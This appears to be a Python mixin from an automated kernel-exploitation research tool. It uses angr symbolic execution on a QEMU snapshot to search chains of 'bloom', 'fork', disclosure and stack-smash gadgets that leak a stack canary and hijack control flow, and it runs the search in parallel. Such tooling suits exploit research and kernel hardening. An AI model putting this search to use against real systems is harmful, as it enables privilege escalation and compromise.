import pickle
import os
import time
import datetime
import angr
import colorama
import pwnlib
import time
from IPython import embed
from multiprocessing import Process, Pool, Queue


class ExploitRoutineDFSMixin:
    def _smash(self, start_good_disclosure_state_idx):
        """
        try all candidate smash gadget
        :param start_good_disclosure_state_idx:
        :return:
        """
        for good_disclosure_state in self.good_disclosure_state[start_good_disclosure_state_idx:]:
            success = self.multiple_runs_smash_gadgets(good_disclosure_state)
            if success:  # at least we get a good smash state
                break
        return

    def _leak(self):
        """
        using the recent good bloom_fork_gadget to try leak current stack canary
        :return:
        """
        good_bloom_fork_pair = self.good_bloom_fork_gadget_pair[-1]
        number_of_old_good_disclosure_gadget = len(self.good_disclosure_state)
        # we will perform symbolic tracing to reach the first fork site
        print('[+] multiple runs bloom and fork gadget')
        bloom_gadget = good_bloom_fork_pair[0]
        forking_gadget = good_bloom_fork_pair[1]
        constraints = good_bloom_fork_pair[2]  # maybe remove this
        constraints_at_first_fork_site = good_bloom_fork_pair[3]
        history_bbl_addrs = good_bloom_fork_pair[4]
        first_reached_fork_site = good_bloom_fork_pair[5]
        self.current_bloom_gadget = bloom_gadget  # set current bloom gadget
        self.current_forking_gadget = forking_gadget  # set current_forking_gadget
        self.current_firstly_reached_fork_site = first_reached_fork_site
        initial_state = self.initial_state

        if first_reached_fork_site in [1, 3]:
            print('firstly reach first fork site')
        elif first_reached_fork_site in [2, 4]:
            print('firstly reach second fork site')
        else:
            assert 0
        self.tmp_good_disclosure_state_number = 0
        fork_site_state = None
        trial_number = 0

        # keep trying symbolic tracing to reach the first fork site
        while fork_site_state is None and trial_number < 15:
            tmp_state = initial_state.copy()
            # perform symbolic tracing now
            fork_site_state = self.run_symbolic_tracing_to_first_fork_site(tmp_state, bloom_gadget,
                                forking_gadget, history_bbl_addrs,
                                first_constraint_func=self.first_constraint_func)
            del tmp_state
            trial_number += 1
        if fork_site_state is None:  # did not reach the fork site
            print('failed symbolic tracing attempt')
            if self.debug_dfs:
                embed()
            return
        print('finished symbolic tracing')
        for i, prologue_disclosure_pair in enumerate(self.prologue_disclosure_pairs):
            print('====== checking %d/%d pair of prologue and disclosure gadget' % (i,
                                                                                    len(self.prologue_disclosure_pairs)))
            #if i < 600:  # debug only
                #continue  # debug only
            tmp_state = fork_site_state.copy()
            prologue_gadget = prologue_disclosure_pair[0]
            prologue_entry = prologue_gadget[6]
            # constrain first fork site to the entry of prologue function and checks satisfiability.
            tmp_state.add_constraints(tmp_state.regs.rip == prologue_entry)
            if not tmp_state.satisfiable():
                print('[+] can not constrain rip to this prologue gadget', prologue_gadget)
                continue
            self.run_prologue_and_disclosure_gadget(tmp_state, bloom_gadget, forking_gadget, prologue_disclosure_pair
                                                    , first_reached_fork_site, first_constraint_func=None)
            # check whether we found leak state
            if number_of_old_good_disclosure_gadget < len(self.good_disclosure_state):  # found new disclosure state
                print('[+] found new good disclosure gadget, try smashing :)')

                # continue and do smash
                self._smash(number_of_old_good_disclosure_gadget)

                number_of_old_good_disclosure_gadget = len(self.good_disclosure_state)  # update number of good gadget
            del tmp_state

        del fork_site_state

        return

    def _fork(self, start_fork_idx=0, end_fork_idx=-1):
        good_bloom_gadget = self.good_bloom_gadget[-1]
        print('[+] multiple runs forking gadget')
        bloom_gadget = good_bloom_gadget[0]
        bloom_state = good_bloom_gadget[1]
        self.current_bloom_gadget = bloom_gadget
        total = len(self.fork_gadgets)
        if end_fork_idx == -1:
            end_fork_idx = total
        for i, forking_gadget in enumerate(self.fork_gadgets):
            print('[+] ===== checking %d/%d th forking gadget...=====' % (i, total))
            print(forking_gadget)
            if i < start_fork_idx:
                print('skip this fork gadget')
                continue
            if i >= end_fork_idx:
                print('skip this fork gadget')
                continue
            tmp_state = bloom_state.copy()
            old_number_of_good_bloom_fork_gadget_pair = len(self.good_bloom_fork_gadget_pair)
            self.run_forking_gadget(tmp_state, good_bloom_gadget, forking_gadget)  # run fork gadget
            fork_entry, first_fork_site, second_fork_site = self.get_forking_gadget_entry_and_sites(forking_gadget)
            # remove hook at forking site
            self.b.unhook(first_fork_site)
            self.b.unhook(second_fork_site)
            del tmp_state
            new_number_of_good_bloom_fork_gadget_pair = len(self.good_bloom_fork_gadget_pair)
            if old_number_of_good_bloom_fork_gadget_pair != new_number_of_good_bloom_fork_gadget_pair:  # found fork gadgets
                self._leak()

        return

    def _bloom(self, start_bloom_idx, only_once=False, start_fork_idx=0, end_fork_idx=-1):

        total = len(self.bloom_gadgets)
        for i, bloom_gadget in enumerate(self.bloom_gadgets):
            if only_once:
                if i != start_bloom_idx:
                    continue
                else:
                    print('[+] ===== checking %d/%d th bloom gadget: ' % (i, total) + bloom_gadget[1].decode('utf-8')
                          + '... =====')
                    self.draw_progress_bar(i, total)
            else:
                if i < start_bloom_idx:
                    continue
                else:
                    print('[+] ===== checking %d/%d th bloom gadget: ' % (i, total) + bloom_gadget[1].decode('utf-8')
                          + '... =====')
                    self.draw_progress_bar(i, total)
            # some function should be put in blacklist
            if bloom_gadget[1] == 'udp_v6_early_demux':
                continue
            if only_once:
                tmp_state = self.initial_state.copy()
                seen_bloom_state = self.run_bloom_gadget(tmp_state, bloom_gadget, first_constraint_func=self.first_constraint_func)
                del tmp_state
            else:
                tmp_state = self.initial_state.copy()
                seen_bloom_state = self.run_bloom_gadget(tmp_state, bloom_gadget, first_constraint_func=self.first_constraint_func)
                del tmp_state
            if seen_bloom_state:  # has found bloom state
                self._fork(start_fork_idx=start_fork_idx, end_fork_idx=end_fork_idx)  # do fork state
        return

    def doit_dfs(self, use_qemu_snapshot=False, start_bloom_idx=0, debug_dfs=False, multiple_process=False):
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.debug_dfs=debug_dfs
        self.use_qemu_snapshot = use_qemu_snapshot
        self.start_bloom_idx = start_bloom_idx
        if not use_qemu_snapshot:
            print('[+] taking snapshot')
            self.dump_hyper_parameters()
            self.take_qemu_snapshot()
            print('finished taking snapshot')
        else:
            # init state
            self.load_hyper_parameters()
            self.load_qemu_snapshot()

            # start dfs search for exploit chains
            if multiple_process:
                self._bloom_multiple_threads(start_bloom_idx)
            else:
                self._bloom(start_bloom_idx)
        return

    def doit_dfs_once(self,  start_bloom_idx=0, start_fork_idx=0, end_fork_idx=-1):
        self.start_bloom_idx = start_bloom_idx
        # start dfs search for exploit chains
        self._bloom(start_bloom_idx, only_once=True, start_fork_idx=start_fork_idx, end_fork_idx=end_fork_idx)
        return

    def doit_bloom_only(self, start_bloom_idx=0, use_qemu_snapshot=True):
        self.good_bloom_gadgets_index = []
        if not use_qemu_snapshot:
            assert 0
        self.bloom_log_file = open('bloom_log.txt', 'w')
        self.use_qemu_snapshot = use_qemu_snapshot
        self.load_hyper_parameters()
        self.load_qemu_snapshot()
        self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)
        if self.pause_on_init_state:
            print('init state ready')
            embed()
        total = len(self.bloom_gadgets)
        for i, bloom_gadget in enumerate(self.bloom_gadgets, start=start_bloom_idx):
            print('[+] ===== checking %d/%d th bloom gadget... =====' % (i, total))
            if bloom_gadget[1] == 'udp_v6_early_demux':
                continue
            tmp_state = self.initial_state.copy()
            seen_bloom_state = self.run_bloom_gadget(tmp_state, bloom_gadget,
                                                     first_constraint_func=self.first_constraint_func)
            del tmp_state
            if seen_bloom_state:
                self.good_bloom_gadgets_index.append(i)
                self.bloom_log_file.write(str(i)+'\n')
        self.bloom_log_file.close()
        time.sleep(2)
        return

    def doit_relay_only(self, gap_size=None, use_qemu_snapshot=True, register_of_heap_ptr = 'rdi'):
        if not use_qemu_snapshot or gap_size is None:
            assert 0
        self.relay_log_file = open('relay_log_'+str(gap_size), 'w')
        self.use_qemu_snapshot = use_qemu_snapshot
        self.load_hyper_parameters()
        self.load_qemu_snapshot()

        # get initial state
        self.initial_state = self.get_initial_state(control_memory_base=self.controlled_memory_base)

        # concretize heap region pointed by rdi
        if register_of_heap_ptr == 'rdi':
            reg = self.initial_state.registers.load('rdi')
        else:
            reg = self.initial_state.registers.load(register_of_heap_ptr)
        rdi_page = reg & 0xfffffffffffff000
        val = self.sol.eval(reg, 1)[0]
        #next_chunk = val + 0x100
        next_chunk = val + gap_size
        self.r = pwnlib.tubes.remote.remote('127.0.0.1', self.qemu_port)
        addr_to_concretize = [rdi_page, rdi_page+0x1000, rdi_page-0x1000]
        for addr in addr_to_concretize:
            con = self.statebroker.get_a_page(self.r, addr)
            if con is not None:
                self.set_concret_memory_region(self.initial_state, addr, con, 4096)
        zero_buf = '\x00'*gap_size
        self.initial_state.memory.store(reg, zero_buf, inspect=False)
        # add extra symbolic value:
        self.auxiliary_spray_obj_bytes = []
        for i in range(gap_size):
            symbolic_byte = self.initial_state.se.BVS("spray_obj"+str(i), 8)
            self.auxiliary_spray_obj_bytes.append(symbolic_byte)
            self.initial_state.memory.store(next_chunk + i, symbolic_byte, inspect=False)
        self.r.close()

        self.multiple_run_relay_gadgets()
        self.relay_log_file.close()
        return

    def doit_parallel_v3(self, start_bloom_idx=0, only_use_good_bloom=False, processes=None, sub_task_number=None,
                         use_qemu_snapshot=True, debug_dfs=False):

        if only_use_good_bloom:
            if not os.path.isfile('bloom_log.txt'):
                assert 0
            self.good_bloom_gadgets_index = []
            with open('bloom_log.txt') as f:
                logs = f.readlines()
            for log in logs:
                log_idx = int(log.strip())
                self.good_bloom_gadgets_index.append(log_idx)

        if not use_qemu_snapshot or processes is None or sub_task_number is None:
            assert 0
        # get a pool
        with open('starttime.txt','a') as f:
            f.write(str(time.time())+'\n')
        # pool = Pool(processes=processes)
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs

        # init state
        self.load_hyper_parameters()
        initial_state = self.get_initial_state(switch_cpu=True,
                                               control_memory_base=self.controlled_memory_base,
                                               control_memory_size=self.controlled_memory_size)
        self.initial_state = initial_state
        if self.pause_on_init_state:
            print('init state ready')
            embed()
        len_fork_gadget = len(self.fork_gadgets)
        if len_fork_gadget % sub_task_number != 0:
            normalized_len_fork_gadget = len_fork_gadget + (sub_task_number - len_fork_gadget % sub_task_number)
        else:
            normalized_len_fork_gadget = len_fork_gadget
        # prepare task queue
        tasks = []
        if not only_use_good_bloom:
            for i in range(start_bloom_idx, len(self.bloom_gadgets)):
                start_fork_idx = 0
                end_fork_idx = -1
                for j in range(sub_task_number):
                    if end_fork_idx != -1:
                        start_fork_idx = end_fork_idx
                    else:
                        start_fork_idx = 0
                    end_fork_idx = (j + 1) * (normalized_len_fork_gadget / sub_task_number)
                    tasks.append((i, start_fork_idx, end_fork_idx,))
        else:
            for i in range(start_bloom_idx, len(self.bloom_gadgets)):
                if i not in self.good_bloom_gadgets_index:
                    continue
                start_fork_idx = 0
                end_fork_idx = -1
                for j in range(sub_task_number):
                    if end_fork_idx != -1:
                        start_fork_idx = end_fork_idx
                    else:
                        start_fork_idx = 0
                    end_fork_idx = (j + 1) * (normalized_len_fork_gadget / sub_task_number)
                    if start_fork_idx < len_fork_gadget:
                        tasks.append((i, start_fork_idx, end_fork_idx,))

        print('there are in total %d tasks' % len(tasks))

        print('prepareing task queue')
        for task in tasks:
            print(task)
            self.queue.put(task)

        print('starting workers')
        worker_list=[]
        for i in range(processes):
            p=Process(target=self.osok_worker, args=())
            p.start()
            worker_list.append(p)

        for i in range(processes):
            self.queue.put('STOP')
        for p in worker_list:
            p.join()

    def osok_worker(self):
        for args in iter(self.queue.get, 'STOP'):
            print('args', args)
            p = Process(target=self.vm_test, args=args)
            p.start()
            p.join()

    def doit_parallel_v2(self, processes=None, sub_task_number=None, use_qemu_snapshot=True, debug_dfs=False):
        if not use_qemu_snapshot or processes is None or sub_task_number is None:
            assert 0
        # get a pool
        pool = Pool(processes=processes)
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs

        # init state
        self.load_hyper_parameters()
        initial_state = self.get_initial_state()
        self.initial_state = initial_state
        if self.pause_on_init_state:
            print('init state ready')
            embed()
        len_fork_gadget = len(self.fork_gadgets)
        if len_fork_gadget % sub_task_number != 0:
            normalized_len_fork_gadget = len_fork_gadget + (sub_task_number - len_fork_gadget % sub_task_number)
        else:
            normalized_len_fork_gadget = len_fork_gadget

        for i in range(101, 1055):
            start_fork_idx = 0
            end_fork_idx = -1
            for j in range(sub_task_number):
                if end_fork_idx != -1:
                    start_fork_idx = end_fork_idx
                else:
                    start_fork_idx = 0
                end_fork_idx = (j + 1) * (normalized_len_fork_gadget / sub_task_number)
                # print(start_fork_idx, end_fork_idx)
                #pool.apply_async(target=self.vm_test, args=(i, start_fork_idx, end_fork_idx,))
                res=pool.apply_async(self.vm_test, (i, start_fork_idx, end_fork_idx,))
                res.get()

        pool.close()
        pool.join()

    def doit_parallel(self, task_number, use_qemu_snapshot=True, debug_dfs=False):
        self.prologue_disclosure_pairs = self.get_prologue_disclosure_pairs()
        self.is_dfs_search_routine = True
        self.use_qemu_snapshot = use_qemu_snapshot
        self.debug_dfs = debug_dfs
        self.task_number = task_number
        if not use_qemu_snapshot:
            print('[+] taking snapshot')
            self.dump_hyper_parameters()
            self.take_qemu_snapshot()
            print('finished taking snapshot')
        else:
            # init state
            self.load_hyper_parameters()
            # in parallel mode, all instance share one vm
            # self.load_qemu_snapshot()
            # get initial state
            initial_state = self.get_initial_state(switch_cpu=True,
                                                   control_memory_base=self.controlled_memory_base,
                                                   control_memory_size=self.controlled_memory_size)
            self.initial_state = initial_state
            if self.pause_on_init_state:
                embed()

        # do it parallelly
        execution_queue = []
        for remainder in range(task_number):
            p = Process(target=self.test_fork_mem_efficient, args=(remainder,))
            execution_queue.append(p)
        for task in execution_queue:
            task.start()
            print(task.pid)
        for task in execution_queue:
            task.join()

    def test_fork_mem_efficient(self, remainder=-1):
        assert remainder != -1
        len_fork_gadget = 254
        for i in range(101, 1055):
            if i % self.task_number == remainder:
                start_fork_idx = 0
                end_fork_idx = -1
                for j in range(6):
                    time.sleep(2)
                    if end_fork_idx != -1:
                        start_fork_idx = end_fork_idx
                    else:
                        start_fork_idx = 0
                    end_fork_idx = (j + 1) * (len_fork_gadget / 6) + 5
                    # print(start_fork_idx, end_fork_idx)
                    p = Process(target=self.vm_test, args=(i, start_fork_idx, end_fork_idx,))
                    p.start()
                    print('subprocess %d for handling remainder %d started' % (p.pid, remainder))
                    p.join()
        print('end of subprocess:', remainder)

    def vm_test(self, start_bloom_idx, start_fork_idx=0, end_fork_idx=-1):
        self.doit_dfs_once(start_bloom_idx=start_bloom_idx,
                           start_fork_idx=start_fork_idx,
                           end_fork_idx=end_fork_idx)

